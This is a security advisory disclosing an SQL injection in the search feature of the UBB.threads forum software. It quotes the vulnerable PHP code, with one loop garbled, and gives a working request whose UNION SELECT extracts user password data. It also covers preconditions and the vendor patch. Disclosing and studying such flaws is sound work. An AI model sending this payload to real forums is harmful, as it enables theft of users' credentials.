UBB.threads SQL Injection
Vendor: Groupee, Inc.
Product: UBB.threads
Version: <= 7.3.1
Website: http://www.ubbcentral.com/
BID: 14052
CVE: CVE-2008-6970
OSVDB: 47954
SECUNIA: 31804
Description:
UBB.threads is a popular online forum system written in php that allows webmasters and site owners to host their own discussion forums within their website. Unfortunately UBB.threads is vulnerable to an SQL Injection in it's search functionality that may allow for an attacker to execute arbitrary SQL queries on the underlying database. An updated version of UBB.threads has been released to address this issue and users should upgrade as soon as possible.


SQL Injection
There is an SQL Injection issue within the UBB.threads search functionality that may allow for an attacker to execute arbitrary SQL queries on the underlying database. The vulnerable code can be found in dosearch.inc.php

// The forums we are searching will be in a different format
// depending on where we are coming from
if (@is_array($_POST['Forum'])) {
	$Forum = join(",",$_POST['Forum']);
}
elseif (@is_array($_GET['Forum'])) {
	$Forum = join(",",$_GET['Forum']);
}
elseif (isset($_POST['Forum'])) {
	$Forum = ",{$_POST['Forum']},";
}
elseif (isset($_GET['Forum'])) {
	$Forum = ",{$_GET['Forum']},";
}
else {
	$Forum = "";
}


As we can see in the above code, the $Forum variable is assigned unsanitized GPC data, based on a few different conditions. Soon after this the following code is executed.

// Now we need to figure out what forums we are searching
$catin = "";
$boardin = "";
$allforums = "";
$forumlist = "";
$Forum = split(",",$Forum);
for($i=0;$i $kids) {
				if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) {
					$boardin .="'$fid',";
				} // end if
			} // end foreach
		}
	}
}
$catin = preg_replace("/,$/","",$catin);
$boardin = preg_replace("/,$/","",$boardin);
$forumlist = preg_replace("/,$/","",$forumlist);
if ($catin) {
	$catin = "CATEGORY_ID IN ($catin)";
	if ($boardin) { $catin .= " OR "; }
}
if ($boardin) {
	$boardin = "FORUM_ID IN ($boardin)";
}
if (!$catin && !$boardin) {
	$catin = "1";
}

// Regular query  here, since all query vars come from within the script
$query = "
	SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE
	FROM {$config['TABLE_PREFIX']}FORUMS
	WHERE FORUM_IS_ACTIVE = '1'
	AND ($catin $boardin)
";
$sth = $dbh -> do_query($query,__LINE__,__FILE__);
$boardin = "";

At first this issue appears hard to effectively exploit as commas, and certain letters are out of the question, not to mention everything sent to the $Forum array is encapsulated in single quotes. However, an attacker can make a search request like the one below and successfully execute fairly dangerous SQL queries.

ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*

A couple of preconditions exist. First a user must be logged in (it can be a standard user account), and in my specific example above the search actually has to return true. So, in order to see the first character of the first users password we could have to specify a valid search term (the Words parameter) and a valid forum id (the first column of my union select is a 1, which is the valid forum id). Of course this is one quickly put together example, and other SQL Injection attacks are possible as well.


Solution:
The UBB.threads developers were very prompt in addressing this issue and released a patch the same day as we reported the issue to them. An updated version of UBB.threads can be found at the official UBB.threads website.

http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/


Credits:
James Bercegay of the GulfTech Security Research Team